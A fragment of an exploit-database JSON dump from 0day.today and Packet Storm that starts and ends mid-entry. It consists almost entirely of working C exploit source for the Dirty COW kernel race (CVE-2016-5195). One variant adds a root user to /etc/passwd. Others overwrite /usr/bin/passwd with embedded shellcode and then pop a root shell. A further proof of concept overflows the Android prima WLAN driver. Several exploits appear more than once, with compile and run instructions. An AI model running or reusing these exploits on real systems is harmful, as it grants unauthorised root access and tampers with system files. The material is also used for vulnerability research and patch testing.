Mehlmauer\r\n// https://firefart.at\r\n//\r\n \r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n \r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n \r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n \r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n \r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n \r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, 
u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n \r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n \r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n \r\n char ch;\r\n FILE *source, *target;\r\n \r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n \r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n \r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n \r\n fclose(source);\r\n fclose(target);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n \r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n \r\n char *plaintext_pw;\r\n \r\n if (argc >= 2) {\r\n plaintext_pw = argv[1];\r\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\r\n } else {\r\n plaintext_pw = getpass(\"Please enter the new password: \");\r\n }\r\n \r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n \r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n 
MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n \r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}\n\n# 0day.today [2018-03-28] #", "sourceHref": "https://0day.today/exploit/26430", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:25:08", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25952", "id": "1337DAY-ID-25952", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. 
to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd is overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n \r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n \r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n \r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n \r\n/*\r\n* $ msfvenom -p 
linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n \r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n \r\n fread(buf, sc_len, 1, fp);\r\n \r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s is overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n \r\n fclose(fp);\r\n sleep(1);\r\n }\r\n \r\n stop = 1;\r\n \r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n \r\n system(suid_binary);\r\n}\r\n \r\nint main(int argc,char *argv[]) 
{\r\n char *backup;\r\n \r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s.. to /tmp/bak\\n\", suid_binary);\r\n \r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n \r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n \r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n \r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n \r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n \r\n printf(\"Racing, this may take a while..\\n\");\r\n \r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n \r\n pthread_join(pth3, NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/25952", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-17T21:28:04", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition PoC (Write Access) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26429", "id": "1337DAY-ID-26429", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap 
bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth 
,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26429"}, {"lastseen": "2018-01-05T07:15:40", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Local Root Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25943", "id": "1337DAY-ID-25943", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. 
to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*\r\n* @robinverton \r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n\r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n\r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/ \r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n\r\n/*\r\n* $ 
msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n\r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n\r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n\r\n fread(buf, sc_len, 1, fp);\r\n\r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n\r\n fclose(fp);\r\n sleep(1);\r\n }\r\n\r\n stop = 1;\r\n\r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n\r\n system(suid_binary);\r\n}\r\n\r\nint main(int argc,char *argv[]) 
{\r\n char *backup;\r\n\r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s to /tmp/bak\\n\", suid_binary);\r\n\r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n\r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n\r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n\r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n\r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n\r\n printf(\"Racing, this may take a while..\\n\");\r\n\r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n\r\n pthread_join(pth3, NULL);\r\n\r\n return 0;\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/25943", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:51", "description": "", "published": "2016-01-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel prima WLAN Driver Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "id": "PACKETSTORM:135372", "href": "https://packetstormsecurity.com/files/135372/Linux-Kernel-prima-WLAN-Driver-Heap-Overflow.html", "sourceData": "`/* \n* Coder: Shawn the R0ck, [citypw@gmail.com] \n* Co-worker: Pray3r, [pray3r.z@gmail.com] \n* Compile: \n* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \n* # ./a.out wlan0 \n* Boom......shit happens[ as always];-) \n*/ \n \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <sys/ioctl.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <linux/wireless.h> \n#include <errno.h> \n \ntypedef unsigned char v_U8_t; \n#define HDD_MAX_CMP_PER_PACKET_FILTER 5 \n \nstruct PacketFilterParamsCfg { \nv_U8_t protocolLayer; \nv_U8_t cmpFlag; 
\nv_U8_t dataOffset; \nv_U8_t dataLength; \nv_U8_t compareData[8]; \nv_U8_t dataMask[8]; \n}; \n \ntypedef struct { \nv_U8_t filterAction; \nv_U8_t filterId; \nv_U8_t numParams; \nstruct PacketFilterParamsCfg \nparamsData[HDD_MAX_CMP_PER_PACKET_FILTER]; \n} tPacketFilterCfg, *tpPacketFilterCfg; \n \nint main(int argc, const char *argv[]) \n{ \nif (argc != 2) { \nfprintf(stderr, \"Bad usage\\n\"); \nfprintf(stderr, \"Usage: %s ifname\\n\", argv[0]); \nreturn -1; \n} \n \nstruct iwreq req; \nstrcpy(req.ifr_ifrn.ifrn_name, argv[1]); \nint fd, status, i = 0; \nfd = socket(AF_INET, SOCK_DGRAM, 0); \ntPacketFilterCfg p_req; \n \n/* crafting a data structure to triggering the code path */ \nreq.u.data.pointer = \nmalloc(sizeof(v_U8_t) * 3 + \nsizeof(struct PacketFilterParamsCfg) * 5); \np_req.filterAction = 1; \np_req.filterId = 0; \np_req.numParams = 3; \nfor (; i < 5; i++) { \np_req.paramsData[i].dataLength = 241; \nmemset(&p_req.paramsData[i].compareData, 0x41, 16); \n} \n \nmemcpy(req.u.data.pointer, &p_req, \nsizeof(v_U8_t) * 3 + \nsizeof(struct PacketFilterParamsCfg) * 5); \n \nif (ioctl(fd, 0x8bf7, &req) == -1) { \nfprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\", \nargv[1], strerror(errno)); \n} else { \nprintf(\"You shouldn't see this msg...\\n\"); \n} \n \n} \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135372/linuxprimawlan-overflow.txt"}, {"lastseen": "2016-12-05T22:20:07", "description": "", "published": "2016-11-25T00:00:00", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-25T00:00:00", "id": "PACKETSTORM:139922", "href": "https://packetstormsecurity.com/files/139922/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "sourceData": "`// $ echo pikachu|sudo tee pokeball;ls -l 
pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball \n#include <fcntl.h> //// pikachu \n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball \n#include <string.h> //// pokeball \n#include <stdio.h> //// (___) \n#include <stdint.h> //// (o o)_____/ \n#include <sys/mman.h> //// @@ ` \\ \n#include <sys/types.h> //// \\ ____, /miltank \n#include <sys/stat.h> //// // // \n#include <sys/wait.h> //// ^^ ^^ \n#include <sys/ptrace.h> //// mmap bc757000 \n#include <unistd.h> //// madvise 0 \n////////////////////////////////////////////// ptrace 0 \n////////////////////////////////////////////// miltank \n////////////////////////////////////////////// \nint f ;// file descriptor \nvoid *map ;// memory map \npid_t pid ;// process id \npthread_t pth ;// thread \nstruct stat st ;// file info \n////////////////////////////////////////////// \nvoid *madviseThread(void *arg) {// madvise thread \nint i,c=0 ;// counters \nfor(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 \nc+=madvise(map,100,MADV_DONTNEED) ;// race condition \nprintf(\"madvise %d\\n\\n\",c) ;// sum of errors \n}// /madvise thread \n////////////////////////////////////////////// \nint main(int argc,char *argv[]) {// entrypoint \nif(argc<3)return 1 ;// ./d file contents \nprintf(\"%s \\n\\ \n(___) \\n\\ \n(o o)_____/ \\n\\ \n@@ ` \\\\ \\n\\ \n\\\\ ____, /%s \\n\\ \n// // \\n\\ \n^^ ^^ \\n\\ \n\", argv[1], argv[2]) ;// dirty cow \nf=open(argv[1],O_RDONLY) ;// open read only file \nfstat(f,&st) ;// stat the fd \nmap=mmap(NULL ,// mmap the file \nst.st_size+sizeof(long) ,// size is filesize plus padding \nPROT_READ ,// read-only \nMAP_PRIVATE ,// private mapping for cow \nf ,// file descriptor \n0) ;// zero \nprintf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code \npid=fork() ;// fork process \nif(pid) {// if parent \nwaitpid(pid,NULL,0) ;// wait for child \nint u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) \nfor(i=0;i<10000/l;i++)//////////////////// 
